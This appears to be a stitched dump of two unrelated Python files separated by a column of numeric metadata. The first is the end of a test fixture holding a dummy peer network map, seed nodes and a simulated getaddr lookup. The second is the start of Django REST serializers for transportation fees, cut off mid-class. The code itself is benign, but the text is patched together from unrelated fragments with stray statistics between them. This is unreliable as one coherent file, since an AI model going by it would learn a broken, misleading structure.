    "5.2.5.7": [{"ip": "5.2.8.8"}, {"ip": "5.2.8.6"}, {"ip": "5.2.8.0"}, {"ip": "5.2.0.6"}, {"ip": "5.2.0.2"}, {"ip": "5.2.4.5"}, {"ip": "5.2.4.8"}, ],
    "5.2.5.4": [{"ip": "5.2.3.1"}, {"ip": "5.1.9.6"}, {"ip": "5.2.2.2"}, {"ip": "5.2.7.5"}, {"ip": "5.2.7.6"}, {"ip": "5.2.7.3"}, {"ip": "5.2.4.3"}, {"ip": "5.2.4.7"}, {"ip": "5.2.0.0"}, {"ip": "5.2.1.8"}, {"ip": "5.2.5.1"}, ],
    "5.2.5.5": [{"ip": "5.2.3.0"}, {"ip": "5.2.3.2"}, {"ip": "5.2.6.5"}, {"ip": "5.2.2.3"}, {"ip": "5.2.8.6"}, {"ip": "5.2.6.1"}, {"ip": "5.2.8.3"}, {"ip": "5.2.8.1"}, {"ip": "5.2.1.7"}, {"ip": "5.2.0.9"}, ],
    "5.2.5.8": [{"ip": "5.2.7.9"}, {"ip": "5.2.2.1"}, {"ip": "5.2.9.1"}, {"ip": "5.2.0.5"}, {"ip": "5.2.7.3"}, {"ip": "5.2.8.1"}, {"ip": "5.1.9.3"}, {"ip": "5.2.4.7"}, {"ip": "5.2.4.8"}, {"ip": "5.2.8.4"}, ],
    "5.2.5.9": [{"ip": "5.2.2.4"}, {"ip": "5.2.3.1"}, {"ip": "5.2.3.2"}, {"ip": "5.2.8.4"}, {"ip": "5.2.0.6"}, {"ip": "5.2.1.2"}, {"ip": "5.2.0.3"}, ],
    "5.2.4.9": [{"ip": "5.2.3.7"}, {"ip": "5.2.3.9"}, {"ip": "5.2.8.4"}, {"ip": "5.2.9.0"}, {"ip": "5.2.1.3"}, {"ip": "5.2.0.2"}, {"ip": "5.1.9.8"}, {"ip": "5.2.5.3"}, ],
    "5.2.4.8": [{"ip": "5.2.2.0"}, {"ip": "5.2.8.6"}, {"ip": "5.2.1.4"}, {"ip": "5.2.7.2"}, {"ip": "5.2.5.8"}, {"ip": "5.2.5.7"}, {"ip": "5.2.6.4"}, ],
    "5.2.4.5": [{"ip": "5.2.2.0"}, {"ip": "5.2.6.1"}, {"ip": "5.2.7.9"}, {"ip": "5.2.6.6"}, {"ip": "5.2.0.7"}, {"ip": "5.2.9.1"}, {"ip": "5.2.7.6"}, {"ip": "5.2.7.0"}, {"ip": "5.2.1.2"}, {"ip": "5.2.1.6"}, {"ip": "5.2.4.4"}, {"ip": "5.1.9.7"}, {"ip": "5.2.5.7"}, {"ip": "5.1.9.9"}, {"ip": "5.2.5.3"}, {"ip": "5.2.4.7"}, ],
    "5.2.4.4": [{"ip": "5.2.3.6"}, {"ip": "5.2.9.1"}, {"ip": "5.2.8.0"}, {"ip": "5.2.8.1"}, {"ip": "5.2.4.2"}, {"ip": "5.2.4.5"}, {"ip": "5.1.9.8"}, {"ip": "5.2.5.0"}, ],
    "5.2.4.7": [{"ip": "5.2.3.1"}, {"ip": "5.2.6.3"}, {"ip": "5.2.3.6"}, {"ip": "5.2.7.5"}, {"ip": "5.2.3.8"}, {"ip": "5.2.5.8"}, {"ip": "5.2.0.7"}, {"ip": "5.2.0.3"}, {"ip": "5.2.4.5"}, {"ip": "5.2.5.4"}, {"ip": "5.2.6.8"}, ],
    "5.2.4.6": [{"ip": "5.2.3.3"}, {"ip": "5.2.6.4"}, {"ip": "5.2.7.8"}, {"ip": "5.2.2.6"}, {"ip": "5.1.9.7"}, {"ip": "5.2.2.0"}, ],
    "5.2.4.1": [{"ip": "5.2.6.4"}, {"ip": "5.2.7.8"}, {"ip": "5.2.8.8"}, {"ip": "5.2.8.7"}, {"ip": "5.2.8.2"}, {"ip": "5.2.0.6"}, {"ip": "5.1.9.2"}, {"ip": "5.1.9.4"}, {"ip": "5.2.2.1"}, ],
    "5.2.4.0": [{"ip": "5.2.1.7"}, {"ip": "5.2.1.1"}, {"ip": "5.2.8.7"}, {"ip": "5.2.0.2"}, {"ip": "5.2.0.9"}, ],
    "5.2.4.3": [{"ip": "5.2.3.1"}, {"ip": "5.2.3.4"}, {"ip": "5.2.7.3"}, {"ip": "5.2.1.3"}, {"ip": "5.2.0.7"}, {"ip": "5.2.0.5"}, {"ip": "5.2.0.1"}, {"ip": "5.2.5.4"}, ],
    "5.2.4.2": [{"ip": "5.2.3.2"}, {"ip": "5.2.2.0"}, {"ip": "5.2.4.4"}, {"ip": "5.2.8.4"}, {"ip": "5.2.7.0"}, {"ip": "5.1.9.2"}, {"ip": "5.1.9.4"}, {"ip": "5.2.0.0"}, {"ip": "5.2.5.6"}, {"ip": "5.2.7.7"}, {"ip": "5.2.0.9"}, ],
    "5.2.3.8": [{"ip": "5.2.2.7"}, {"ip": "5.2.7.9"}, {"ip": "5.2.3.7"}, {"ip": "5.2.8.5"}, {"ip": "5.2.7.1"}, {"ip": "5.2.2.9"}, {"ip": "5.2.8.0"}, {"ip": "5.1.9.4"}, {"ip": "5.2.1.6"}, {"ip": "5.2.5.6"}, {"ip": "5.2.0.8"}, {"ip": "5.2.4.7"}, ],
    "5.2.3.9": [{"ip": "5.2.3.1"}, {"ip": "5.2.3.0"}, {"ip": "5.2.7.9"}, {"ip": "5.2.2.1"}, {"ip": "5.2.9.0"}, {"ip": "5.2.7.2"}, {"ip": "5.2.8.1"}, {"ip": "5.2.4.9"}, ],
    "5.2.3.0": [{"ip": "5.2.6.1"}, {"ip": "5.2.3.2"}, {"ip": "5.2.3.4"}, {"ip": "5.2.3.7"}, {"ip": "5.2.6.8"}, {"ip": "5.2.0.5"}, {"ip": "5.2.3.9"}, {"ip": "5.2.1.0"}, {"ip": "5.2.5.5"}, {"ip": "5.2.5.3"}, {"ip": "5.2.5.2"}, {"ip": "5.2.0.9"}, ],
    "5.2.3.1": [{"ip": "5.2.3.5"}, {"ip": "5.2.8.8"}, {"ip": "5.2.8.9"}, {"ip": "5.2.3.9"}, {"ip": "5.2.8.4"}, {"ip": "5.2.8.2"}, {"ip": "5.2.4.3"}, {"ip": "5.2.1.1"}, {"ip": "5.2.4.7"}, {"ip": "5.2.5.9"}, {"ip": "5.2.1.4"}, {"ip": "5.2.5.6"}, {"ip": "5.2.5.4"}, ],
    "5.2.3.2": [{"ip": "5.2.3.0"}, {"ip": "5.1.9.6"}, {"ip": "5.2.3.6"}, {"ip": "5.2.7.0"}, {"ip": "5.2.7.2"}, {"ip": "5.2.4.2"}, {"ip": "5.2.0.5"}, {"ip": "5.2.5.9"}, {"ip": "5.2.5.5"}, {"ip": "5.2.7.8"}, ],
    "5.2.3.3": [{"ip": "5.2.3.5"}, {"ip": "5.2.0.1"}, {"ip": "5.2.2.2"}, {"ip": "5.2.6.8"}, {"ip": "5.2.7.7"}, {"ip": "5.2.7.6"}, {"ip": "5.2.0.6"}, {"ip": "5.1.9.2"}, {"ip": "5.2.4.6"}, {"ip": "5.2.1.6"}, {"ip": "5.1.9.7"}, {"ip": "5.1.9.8"}, ],
    "5.2.3.4": [{"ip": "5.2.3.0"}, {"ip": "5.2.2.3"}, {"ip": "5.2.8.2"}, {"ip": "5.2.8.3"}, {"ip": "5.2.8.1"}, {"ip": "5.2.4.3"}, {"ip": "5.1.9.7"}, {"ip": "5.2.1.8"}, ],
    "5.2.3.5": [{"ip": "5.2.3.1"}, {"ip": "5.2.3.3"}, {"ip": "5.2.2.0"}, {"ip": "5.2.3.7"}, {"ip": "5.2.0.3"}, {"ip": "5.1.9.5"}, ],
    "5.2.3.6": [{"ip": "5.2.3.2"}, {"ip": "5.2.7.3"}, {"ip": "5.2.1.3"}, {"ip": "5.2.1.0"}, {"ip": "5.2.4.7"}, {"ip": "5.2.4.4"}, {"ip": "5.2.5.1"}, ],
    "5.2.3.7": [{"ip": "5.2.6.0"}, {"ip": "5.2.3.0"}, {"ip": "5.2.2.6"}, {"ip": "5.2.3.5"}, {"ip": "5.2.2.3"}, {"ip": "5.2.3.8"}, {"ip": "5.2.7.7"}, {"ip": "5.2.9.0"}, {"ip": "5.2.0.3"}, {"ip": "5.1.9.7"}, {"ip": "5.2.4.9"}, ],
    "5.2.2.9": [{"ip": "5.2.2.3"}, {"ip": "5.2.8.6"}, {"ip": "5.2.3.8"}, {"ip": "5.2.8.0"}, {"ip": "5.2.0.7"}, {"ip": "5.2.1.0"}, {"ip": "5.2.1.7"}, {"ip": "5.1.9.5"}, {"ip": "5.2.5.6"}, ],
    "5.2.2.8": [{"ip": "5.2.8.9"}, {"ip": "5.2.7.5"}, {"ip": "5.2.6.9"}, {"ip": "5.2.7.6"}, {"ip": "5.2.8.0"}, {"ip": "5.2.1.2"}, {"ip": "5.2.1.1"}, {"ip": "5.1.9.4"}, {"ip": "5.1.9.6"}, {"ip": "5.1.9.9"}, {"ip": "5.2.0.2"}, {"ip": "5.2.5.0"}, ],
    "5.2.2.3": [{"ip": "5.2.2.5"}, {"ip": "5.2.2.7"}, {"ip": "5.2.6.4"}, {"ip": "5.2.3.4"}, {"ip": "5.2.3.7"}, {"ip": "5.2.6.8"}, {"ip": "5.2.6.9"}, {"ip": "5.2.9.0"}, {"ip": "5.2.2.9"}, {"ip": "5.2.7.2"}, {"ip": "5.1.9.4"}, {"ip": "5.2.5.5"}, {"ip": "5.2.0.9"}, ],
    "5.2.2.2": [{"ip": "5.2.6.1"}, {"ip": "5.2.3.3"}, {"ip": "5.2.2.0"}, {"ip": "5.2.8.4"}, {"ip": "5.2.0.2"}, {"ip": "5.2.5.4"}, {"ip": "5.2.0.8"}, {"ip": "5.2.0.9"}, ],
    "5.2.2.1": [{"ip": "5.2.2.7"}, {"ip": "5.2.7.6"}, {"ip": "5.2.3.9"}, {"ip": "5.2.9.1"}, {"ip": "5.2.5.8"}, {"ip": "5.2.7.1"}, {"ip": "5.2.7.2"}, {"ip": "5.2.1.2"}, {"ip": "5.2.4.1"}, {"ip": "5.1.9.4"}, {"ip": "5.2.0.1"}, {"ip": "5.2.1.8"}, {"ip": "5.2.5.3"}, ],
    "5.2.2.0": [{"ip": "5.2.3.5"}, {"ip": "5.2.7.8"}, {"ip": "5.2.2.2"}, {"ip": "5.2.9.1"}, {"ip": "5.2.4.5"}, {"ip": "5.2.7.1"}, {"ip": "5.2.4.2"}, {"ip": "5.2.0.5"}, {"ip": "5.2.4.6"}, {"ip": "5.1.9.5"}, {"ip": "5.2.0.1"}, {"ip": "5.2.4.8"}, {"ip": "5.2.5.2"}, {"ip": "5.2.6.5"}, ],
    "5.2.2.7": [{"ip": "5.2.2.6"}, {"ip": "5.2.9.0"}, {"ip": "5.2.2.1"}, {"ip": "5.2.2.3"}, {"ip": "5.2.6.8"}, {"ip": "5.2.3.8"}, {"ip": "5.2.9.1"}, {"ip": "5.2.6.7"}, {"ip": "5.2.1.1"}, {"ip": "5.1.9.8"}, {"ip": "5.2.5.3"}, ],
    "5.2.2.6": [{"ip": "5.2.6.2"}, {"ip": "5.2.2.7"}, {"ip": "5.2.3.7"}, {"ip": "5.2.6.9"}, {"ip": "5.2.7.7"}, {"ip": "5.2.1.3"}, {"ip": "5.2.0.4"}, {"ip": "5.1.9.4"}, {"ip": "5.1.9.5"}, {"ip": "5.2.1.4"}, {"ip": "5.2.4.6"}, {"ip": "5.2.9.1"}, {"ip": "5.2.0.8"}, ],
    "5.2.2.5": [{"ip": "5.2.1.4"}, {"ip": "5.2.6.2"}, {"ip": "5.2.6.4"}, {"ip": "5.2.2.3"}, {"ip": "5.2.6.9"}, {"ip": "5.2.7.7"}, {"ip": "5.2.7.6"}, {"ip": "5.2.7.0"}, {"ip": "5.2.8.0"}, {"ip": "5.2.0.5"}, {"ip": "5.1.9.4"}, {"ip": "5.2.7.3"}, {"ip": "5.1.9.7"}, ],
    "5.2.2.4": [{"ip": "5.2.6.9"}, {"ip": "5.2.0.6"}, {"ip": "5.2.0.7"}, {"ip": "5.2.0.4"}, {"ip": "5.2.0.2"}, {"ip": "5.2.5.9"}, {"ip": "5.2.8.7"}, ],
    "5.2.9.0": [{"ip": "5.2.6.0"}, {"ip": "5.2.2.7"}, {"ip": "5.2.3.7"}, {"ip": "5.2.2.3"}, {"ip": "5.2.3.9"}, {"ip": "5.2.6.9"}, {"ip": "5.2.8.3"}, {"ip": "5.2.0.5"}, {"ip": "5.2.1.4"}, {"ip": "5.2.5.6"}, {"ip": "5.2.1.9"}, {"ip": "5.2.4.9"}, {"ip": "5.2.5.2"}, {"ip": "5.2.0.8"}, ],
    "5.2.9.1": [{"ip": "5.2.2.6"}, {"ip": "5.2.2.7"}, {"ip": "5.2.2.0"}, {"ip": "5.2.1.5"}, {"ip": "5.2.6.8"}, {"ip": "5.2.0.1"}, {"ip": "5.2.7.5"}, {"ip": "5.2.4.4"}, {"ip": "5.2.4.5"}, {"ip": "5.2.5.8"}, {"ip": "5.2.2.1"}, {"ip": "5.2.6.5"}, ],
    "5.2.1.6": [{"ip": "5.2.3.3"}, {"ip": "5.2.7.8"}, {"ip": "5.2.6.8"}, {"ip": "5.2.3.8"}, {"ip": "5.2.1.4"}, {"ip": "5.2.7.1"}, {"ip": "5.2.8.6"}, {"ip": "5.2.0.4"}, {"ip": "5.1.9.3"}, {"ip": "5.2.0.0"}, {"ip": "5.2.4.5"}, {"ip": "5.1.9.8"}, {"ip": "5.2.5.6"}, {"ip": "5.2.1.8"}, {"ip": "5.1.9.7"}, {"ip": "5.2.0.8"}, {"ip": "5.2.5.0"}, ],
    "5.2.1.7": [{"ip": "5.2.7.5"}, {"ip": "5.2.2.9"}, {"ip": "5.2.8.0"}, {"ip": "5.2.7.0"}, {"ip": "5.2.4.0"}, {"ip": "5.2.7.3"}, {"ip": "5.1.9.9"}, {"ip": "5.2.5.5"}, ],
    "5.2.1.4": [{"ip": "5.2.3.1"}, {"ip": "5.2.2.5"}, {"ip": "5.2.2.6"}, {"ip": "5.2.7.8"}, {"ip": "5.2.6.7"}, {"ip": "5.2.8.7"}, {"ip": "5.2.8.4"}, {"ip": "5.2.9.0"}, {"ip": "5.2.8.1"}, {"ip": "5.2.1.6"}, {"ip": "5.2.6.9"}, {"ip": "5.1.9.9"}, {"ip": "5.2.4.8"}, ],
    "5.2.1.5": [{"ip": "5.2.6.3"}, {"ip": "5.2.6.8"}, {"ip": "5.2.9.1"}, {"ip": "5.2.8.5"}, {"ip": "5.2.0.2"}, {"ip": "5.2.0.3"}, {"ip": "5.2.5.1"}, {"ip": "5.2.0.9"}, ],
    "5.2.1.2": [{"ip": "5.2.7.9"}, {"ip": "5.2.2.1"}, {"ip": "5.2.8.6"}, {"ip": "5.2.2.8"}, {"ip": "5.2.1.3"}, {"ip": "5.2.0.2"}, {"ip": "5.2.5.9"}, {"ip": "5.2.4.5"}, ],
    "5.2.1.3": [{"ip": "5.2.2.6"}, {"ip": "5.2.7.8"}, {"ip": "5.2.1.2"}, {"ip": "5.2.3.6"}, {"ip": "5.2.4.3"}, {"ip": "5.2.0.4"}, {"ip": "5.2.0.2"}, {"ip": "5.2.0.3"}, {"ip": "5.1.9.8"}, {"ip": "5.2.4.9"}, ],
    "5.2.1.0": [{"ip": "5.2.3.0"}, {"ip": "5.2.7.6"}, {"ip": "5.2.6.4"}, {"ip": "5.2.3.6"}, {"ip": "5.2.7.4"}, {"ip": "5.2.8.5"}, {"ip": "5.2.2.9"}, {"ip": "5.2.0.1"}, {"ip": "5.1.9.7"}, {"ip": "5.2.5.1"}, ],
    "5.2.1.1": [{"ip": "5.2.3.1"}, {"ip": "5.2.2.7"}, {"ip": "5.2.8.8"}, {"ip": "5.2.2.8"}, {"ip": "5.2.4.0"}, {"ip": "5.2.6.3"}, {"ip": "5.2.5.6"}, {"ip": "5.2.5.2"}, ],
    "5.2.1.8": [{"ip": "5.2.6.3"}, {"ip": "5.2.3.4"}, {"ip": "5.2.6.6"}, {"ip": "5.2.8.5"}, {"ip": "5.2.0.2"}, {"ip": "5.2.1.6"}, {"ip": "5.1.9.4"}, {"ip": "5.2.5.4"}, {"ip": "5.2.5.2"}, {"ip": "5.2.2.1"}, ],
    "5.2.1.9": [{"ip": "5.2.8.6"}, {"ip": "5.2.9.0"}, {"ip": "5.1.9.7"}, {"ip": "5.2.0.5"}, {"ip": "5.2.6.7"}, ],
    "5.1.9.9": [{"ip": "5.2.6.8"}, {"ip": "5.2.7.4"}, {"ip": "5.2.8.4"}, {"ip": "5.2.4.5"}, {"ip": "5.2.2.8"}, {"ip": "5.2.7.0"}, {"ip": "5.2.0.4"}, {"ip": "5.2.1.7"}, {"ip": "5.2.1.4"}, {"ip": "5.1.9.7"}, {"ip": "5.2.0.8"}, ],
    "5.1.9.8": [{"ip": "5.2.3.3"}, {"ip": "5.2.2.7"}, {"ip": "5.2.6.7"}, {"ip": "5.2.8.9"}, {"ip": "5.2.8.6"}, {"ip": "5.2.8.5"}, {"ip": "5.2.1.3"}, {"ip": "5.2.0.5"}, {"ip": "5.2.1.6"}, {"ip": "5.2.4.4"}, {"ip": "5.2.4.9"}, {"ip": "5.2.5.2"}, {"ip": "5.2.5.1"}, ],
    "5.1.9.5": [{"ip": "5.2.2.6"}, {"ip": "5.2.6.3"}, {"ip": "5.2.2.0"}, {"ip": "5.2.6.9"}, {"ip": "5.2.7.1"}, {"ip": "5.2.2.9"}, {"ip": "5.2.3.5"}, {"ip": "5.2.5.0"}, ],
    "5.1.9.4": [{"ip": "5.2.2.5"}, {"ip": "5.2.2.6"}, {"ip": "5.2.2.1"}, {"ip": "5.2.2.3"}, {"ip": "5.2.3.8"}, {"ip": "5.2.4.2"}, {"ip": "5.2.2.8"}, {"ip": "5.2.6.2"}, {"ip": "5.2.8.3"}, {"ip": "5.2.0.6"}, {"ip": "5.2.4.1"}, {"ip": "5.2.1.8"}, ],
    "5.1.9.7": [{"ip": "5.2.2.5"}, {"ip": "5.2.3.3"}, {"ip": "5.1.9.3"}, {"ip": "5.2.3.4"}, {"ip": "5.2.3.7"}, {"ip": "5.2.7.5"}, {"ip": "5.2.1.0"}, {"ip": "5.2.4.6"}, {"ip": "5.2.1.6"}, {"ip": "5.2.4.5"}, {"ip": "5.1.9.9"}, {"ip": "5.2.5.6"}, {"ip": "5.2.1.9"}, {"ip": "5.2.5.1"}, ],
    "5.1.9.6": [{"ip": "5.2.5.4"}, {"ip": "5.2.0.4"}, {"ip": "5.2.3.2"}, {"ip": "5.2.2.8"}, {"ip": "5.2.5.1"}, ],
    "5.1.9.3": [{"ip": "5.2.6.5"}, {"ip": "5.2.6.9"}, {"ip": "5.2.5.8"}, {"ip": "5.2.8.3"}, {"ip": "5.2.0.5"}, {"ip": "5.2.1.6"}, {"ip": "5.1.9.7"}, ],
    "5.1.9.2": [{"ip": "5.2.6.0"}, {"ip": "5.2.3.3"}, {"ip": "5.2.4.1"}, {"ip": "5.2.6.7"}, {"ip": "5.2.8.7"}, {"ip": "5.2.4.2"}, {"ip": "5.2.0.5"}, {"ip": "5.2.5.1"}, ],
    "5.2.8.9": [{"ip": "5.2.3.1"}, {"ip": "5.2.6.3"}, {"ip": "5.2.6.6"}, {"ip": "5.2.6.9"}, {"ip": "5.2.2.8"}, {"ip": "5.2.0.4"}, {"ip": "5.2.0.2"}, {"ip": "5.2.0.3"}, {"ip": "5.1.9.8"}, ],
    "5.2.8.8": [{"ip": "5.2.3.1"}, {"ip": "5.2.7.4"}, {"ip": "5.2.7.3"}, {"ip": "5.2.1.1"}, {"ip": "5.2.4.1"}, {"ip": "5.2.0.2"}, {"ip": "5.2.8.7"}, {"ip": "5.2.5.7"}, {"ip": "5.2.5.2"}, {"ip": "5.2.5.1"}, ],
    "5.2.8.1": [{"ip": "5.2.6.0"}, {"ip": "5.2.3.4"}, {"ip": "5.2.6.6"}, {"ip": "5.2.3.9"}, {"ip": "5.2.8.4"}, {"ip": "5.2.1.4"}, {"ip": "5.2.4.4"}, {"ip": "5.2.5.8"}, {"ip": "5.2.5.6"}, {"ip": "5.2.5.5"}, ],
    "5.2.8.0": [{"ip": "5.2.2.5"}, {"ip": "5.2.6.9"}, {"ip": "5.2.0.1"}, {"ip": "5.2.2.8"}, {"ip": "5.2.2.9"}, {"ip": "5.2.7.3"}, {"ip": "5.2.0.6"}, {"ip": "5.2.0.4"}, {"ip": "5.2.0.5"}, {"ip": "5.2.1.7"}, {"ip": "5.2.4.4"}, {"ip": "5.2.3.8"}, {"ip": "5.2.5.7"}, {"ip": "5.2.5.6"}, {"ip": "5.2.5.3"}, {"ip": "5.2.5.2"}, ],
    "5.2.8.3": [{"ip": "5.2.9.0"}, {"ip": "5.2.6.4"}, {"ip": "5.2.3.4"}, {"ip": "5.2.8.7"}, {"ip": "5.2.8.5"}, {"ip": "5.2.7.0"}, {"ip": "5.2.7.3"}, {"ip": "5.1.9.3"}, {"ip": "5.1.9.4"}, {"ip": "5.2.5.5"}, {"ip": "5.2.5.2"}, ],
    "5.2.8.2": [{"ip": "5.2.6.0"}, {"ip": "5.2.3.1"}, {"ip": "5.2.3.4"}, {"ip": "5.2.6.7"}, {"ip": "5.2.6.8"}, {"ip": "5.2.6.9"}, {"ip": "5.2.7.1"}, {"ip": "5.2.7.2"}, {"ip": "5.2.4.1"}, {"ip": "5.2.0.3"}, {"ip": "5.2.0.1"}, ],
    "5.2.8.5": [{"ip": "5.2.6.2"}, {"ip": "5.2.6.3"}, {"ip": "5.2.6.5"}, {"ip": "5.2.3.8"}, {"ip": "5.2.7.1"}, {"ip": "5.2.8.3"}, {"ip": "5.2.1.0"}, {"ip": "5.2.1.5"}, {"ip": "5.1.9.8"}, {"ip": "5.2.1.8"}, ],
    "5.2.8.4": [{"ip": "5.2.6.0"}, {"ip": "5.2.3.1"}, {"ip": "5.2.2.2"}, {"ip": "5.2.6.8"}, {"ip": "5.2.7.7"}, {"ip": "5.2.1.4"}, {"ip": "5.2.7.3"}, {"ip": "5.2.8.1"}, {"ip": "5.2.4.2"}, {"ip": "5.2.5.9"}, {"ip": "5.2.5.8"}, {"ip": "5.1.9.9"}, {"ip": "5.2.4.9"}, {"ip": "5.2.5.2"}, ],
    "5.2.8.7": [{"ip": "5.2.2.4"}, {"ip": "5.2.6.1"}, {"ip": "5.2.8.8"}, {"ip": "5.2.6.6"}, {"ip": "5.2.6.7"}, {"ip": "5.2.6.9"}, {"ip": "5.2.8.3"}, {"ip": "5.2.7.3"}, {"ip": "5.2.0.7"}, {"ip": "5.2.4.0"}, {"ip": "5.2.4.1"}, {"ip": "5.2.0.2"}, {"ip": "5.2.1.4"}, {"ip": "5.1.9.2"}, {"ip": "5.2.5.6"}, ],
    "5.2.8.6": [{"ip": "5.2.6.2"}, {"ip": "5.2.7.8"}, {"ip": "5.2.7.7"}, {"ip": "5.2.5.7"}, {"ip": "5.2.2.9"}, {"ip": "5.2.1.2"}, {"ip": "5.2.1.6"}, {"ip": "5.2.4.8"}, {"ip": "5.1.9.8"}, {"ip": "5.2.5.6"}, {"ip": "5.2.5.5"}, {"ip": "5.2.1.9"}, ],
    "5.2.0.1": [{"ip": "5.2.3.3"}, {"ip": "5.2.2.0"}, {"ip": "5.2.2.1"}, {"ip": "5.2.0.7"}, {"ip": "5.2.7.4"}, {"ip": "5.2.9.1"}, {"ip": "5.2.8.2"}, {"ip": "5.2.8.0"}, {"ip": "5.2.7.1"}, {"ip": "5.2.4.3"}, {"ip": "5.2.1.0"}, ],
    "5.2.0.0": [{"ip": "5.2.0.6"}, {"ip": "5.2.6.5"}, {"ip": "5.2.7.7"}, {"ip": "5.2.7.0"}, {"ip": "5.2.4.2"}, {"ip": "5.2.1.6"}, {"ip": "5.2.5.4"}, ],
    "5.2.0.3": [{"ip": "5.2.6.2"}, {"ip": "5.2.3.5"}, {"ip": "5.2.1.5"}, {"ip": "5.2.3.7"}, {"ip": "5.2.8.9"}, {"ip": "5.2.7.7"}, {"ip": "5.2.8.2"}, {"ip": "5.2.1.3"}, {"ip": "5.2.4.7"}, {"ip": "5.2.5.9"}, ],
    "5.2.0.2": [{"ip": "5.2.2.4"}, {"ip": "5.2.1.8"}, {"ip": "5.2.2.2"}, {"ip": "5.2.8.8"}, {"ip": "5.2.8.9"}, {"ip": "5.2.6.9"}, {"ip": "5.2.2.8"}, {"ip": "5.2.1.3"}, {"ip": "5.2.1.2"}, {"ip": "5.2.4.0"}, {"ip": "5.2.1.5"}, {"ip": "5.2.8.7"}, {"ip": "5.2.5.7"}, {"ip": "5.2.4.9"}, ],
    "5.2.0.5": [{"ip": "5.2.3.0"}, {"ip": "5.2.3.2"}, {"ip": "5.2.2.0"}, {"ip": "5.2.2.5"}, {"ip": "5.2.7.4"}, {"ip": "5.2.7.7"}, {"ip": "5.2.9.0"}, {"ip": "5.2.8.0"}, {"ip": "5.2.4.3"}, {"ip": "5.1.9.2"}, {"ip": "5.1.9.3"}, {"ip": "5.2.5.8"}, {"ip": "5.1.9.8"}, {"ip": "5.2.1.9"}, ],
    "5.2.0.4": [{"ip": "5.2.2.4"}, {"ip": "5.2.1.3"}, {"ip": "5.2.2.6"}, {"ip": "5.2.8.9"}, {"ip": "5.2.7.5"}, {"ip": "5.2.8.0"}, {"ip": "5.2.0.6"}, {"ip": "5.2.1.6"}, {"ip": "5.1.9.6"}, {"ip": "5.1.9.9"}, ],
    "5.2.0.7": [{"ip": "5.2.2.4"}, {"ip": "5.2.6.3"}, {"ip": "5.2.7.5"}, {"ip": "5.2.8.7"}, {"ip": "5.2.4.5"}, {"ip": "5.2.2.9"}, {"ip": "5.2.4.3"}, {"ip": "5.2.4.7"}, {"ip": "5.2.0.1"}, {"ip": "5.2.6.8"}, ],
    "5.2.0.6": [{"ip": "5.2.2.4"}, {"ip": "5.2.3.3"}, {"ip": "5.2.6.5"}, {"ip": "5.2.0.0"}, {"ip": "5.2.6.8"}, {"ip": "5.2.8.0"}, {"ip": "5.2.0.4"}, {"ip": "5.2.4.1"}, {"ip": "5.1.9.4"}, {"ip": "5.2.5.9"}, {"ip": "5.2.5.7"}, ],
    "5.2.0.9": [{"ip": "5.2.3.0"}, {"ip": "5.2.6.5"}, {"ip": "5.2.2.2"}, {"ip": "5.2.6.7"}, {"ip": "5.2.2.3"}, {"ip": "5.2.4.2"}, {"ip": "5.2.4.0"}, {"ip": "5.2.1.5"}, {"ip": "5.2.5.5"}, ],
    "5.2.0.8": [{"ip": "5.2.6.1"}, {"ip": "5.2.2.6"}, {"ip": "5.2.6.3"}, {"ip": "5.2.2.2"}, {"ip": "5.2.7.5"}, {"ip": "5.2.3.8"}, {"ip": "5.2.9.0"}, {"ip": "5.2.1.6"}, {"ip": "5.1.9.9"}, ],
}
# Seed nodes (crawl entry points) for DUMMY_NETWORK_B, keyed by seed number.
DUMMY_SEEDS_B = {
    1: "5.2.4.0",
    2: "5.1.9.6",
    3: "5.2.0.4",
    4: "5.2.3.0",
    5: "5.2.7.8",
    6: "5.2.2.0",
    7: "5.2.8.4",
    8: "5.2.0.8",
}
# Active fixtures used by dummy_getaddr(); switch these aliases to the
# *_A variants to test against the small hand-built network instead.
DUMMY_NETWORK = DUMMY_NETWORK_B
DUMMY_SEEDS = DUMMY_SEEDS_B
def dummy_getaddr(node):
    """Return the peers adjacent to *node* in the active dummy network.

    Unknown nodes yield an empty list. The short sleep simulates the
    latency of a real getaddr round-trip.
    """
    time.sleep(0.2)
    return DUMMY_NETWORK.get(node, [])
| 111.839286
| 341
| 0.334624
| 6,150
| 25,052
| 1.359837
| 0.026504
| 0.25278
| 0.451513
| 0.070549
| 0.832835
| 0.81454
| 0.805453
| 0.776157
| 0.70501
| 0.441349
| 0
| 0.235689
| 0.149968
| 25,052
| 223
| 342
| 112.340807
| 0.157032
| 0.050056
| 0
| 0
| 0
| 0
| 0.458682
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.006667
| false
| 0
| 0.006667
| 0
| 0.02
| 0
| 0
| 0
| 1
| null | 1
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 11
|
8ca54f9c75a94b2bdc1ea7eaa1d7325fce4caefd
| 3,729
|
py
|
Python
|
payment/serializers.py
|
ashrafali46/GreaterWMS
|
1aed14a8c26c8ac4571db5e6b07ab7e4fa3c7c72
|
[
"Apache-2.0"
] | 2
|
2021-11-09T10:29:44.000Z
|
2021-11-15T08:03:40.000Z
|
payment/serializers.py
|
ashrafali46/GreaterWMS
|
1aed14a8c26c8ac4571db5e6b07ab7e4fa3c7c72
|
[
"Apache-2.0"
] | null | null | null |
payment/serializers.py
|
ashrafali46/GreaterWMS
|
1aed14a8c26c8ac4571db5e6b07ab7e4fa3c7c72
|
[
"Apache-2.0"
] | null | null | null |
from rest_framework import serializers
from .models import TransportationFeeListModel
from utils import datasolve
class PaymentGetSerializer(serializers.ModelSerializer):
    """Read-only serializer used when listing/retrieving transportation fees."""
    send_city = serializers.CharField(required=False, read_only=True)
    receiver_city = serializers.CharField(required=False, read_only=True)
    weight_fee = serializers.FloatField(required=False, read_only=True)
    volume_fee = serializers.FloatField(required=False, read_only=True)
    transportation_supplier = serializers.CharField(required=False, read_only=True)
    # NOTE: 'creater' spelling must match the model field name.
    creater = serializers.CharField(required=False, read_only=True)
    create_time = serializers.DateTimeField(format='%Y-%m-%d %H:%M:%S', read_only=True)
    update_time = serializers.DateTimeField(format='%Y-%m-%d %H:%M:%S', read_only=True)

    class Meta:
        model = TransportationFeeListModel
        exclude = ['openid', 'is_delete']
        read_only_fields = ['id']
class PaymentPostSerializer(serializers.ModelSerializer):
    """Write serializer for creating a transportation fee record.

    Every user-supplied field is run through the project's datasolve
    validators; ``openid`` is optional because the view may inject it.
    """
